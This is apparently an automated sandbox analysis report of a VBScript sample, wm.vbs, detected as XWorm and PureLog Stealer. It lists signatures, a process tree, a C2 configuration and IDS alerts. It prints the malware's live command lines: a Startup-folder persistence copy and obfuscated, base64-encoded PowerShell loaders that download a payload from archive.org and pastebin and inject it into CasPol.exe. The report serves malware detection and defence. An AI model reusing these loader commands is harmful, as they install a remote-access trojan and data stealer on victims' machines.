
Windows Analysis Report
wm.vbs

Overview

General Information

Sample name: wm.vbs
Analysis ID: 1518301
MD5: 9925d6b112cc586b4c53b9ec22ac9ee3
SHA1: d3a6302d2d70999036849a9cf046ee868ba78427
SHA256: c7d27223d3eeb698eeea7eac9681158f66c0091f5fc2e8ec95c979f324227373
Tags: vbs, user-NDA0E

Detection

PureLog Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7752 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7836 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7880 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 7968 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • CasPol.exe (PID: 2960 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
Malware configuration (XWorm): {"C2 url": ["135.224.23.113"], "Port": "5555", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara matches (memory dumps):
Source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x6a7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6b19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6c2e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x68ee:$cnc4: POST / HTTP/1.1
Source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Yara matches (unpacked PE files):
Source: 10.2.CasPol.exe.400000.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 10.2.CasPol.exe.400000.0.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x6c7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6d19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e2e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6aee:$cnc4: POST / HTTP/1.1
Source: 9.2.powershell.exe.1690061e580.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 9.2.powershell.exe.1690061e580.0.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x4e7c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x4f19:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x502e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x4cee:$cnc4: POST / HTTP/1.1
Source: 9.2.powershell.exe.1697be10000.2.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' 
{1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbSc
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", ProcessId: 7752, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\Syst
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs", ProcessId: 7752, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), CommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7836, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')'), ProcessId: 7968, ProcessName: powershell.exe
Suricata IDS alerts:

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-25T15:26:33.410263+0200 | 2020424 | 1 | Exploit Kit Activity Detected | 188.114.96.3 | 443 | 192.168.2.9 | 49708 | TCP |
| 2024-09-25T15:26:33.237775+0200 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49708 | 188.114.96.3 | 443 | TCP |
| 2024-09-25T15:26:48.914993+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:26:56.345954+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:08.886340+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:09.959923+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:09.960553+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:09.961307+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:18.905785+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:21.030073+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:33.542279+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:45.733239+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:46.497478+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:48.920023+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:52.076093+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:28:02.892902+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:28:14.326148+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:28:14.326621+0200 | 2852870 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:26:56.348028+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:08.917549+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:09.216652+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:09.826591+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:21.031646+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:33.562566+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:45.737886+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:46.499555+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:27:52.082476+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:28:02.894697+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:28:14.327132+0200 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP |
| 2024-09-25T15:26:48.914993+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
| 2024-09-25T15:27:18.905785+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP |
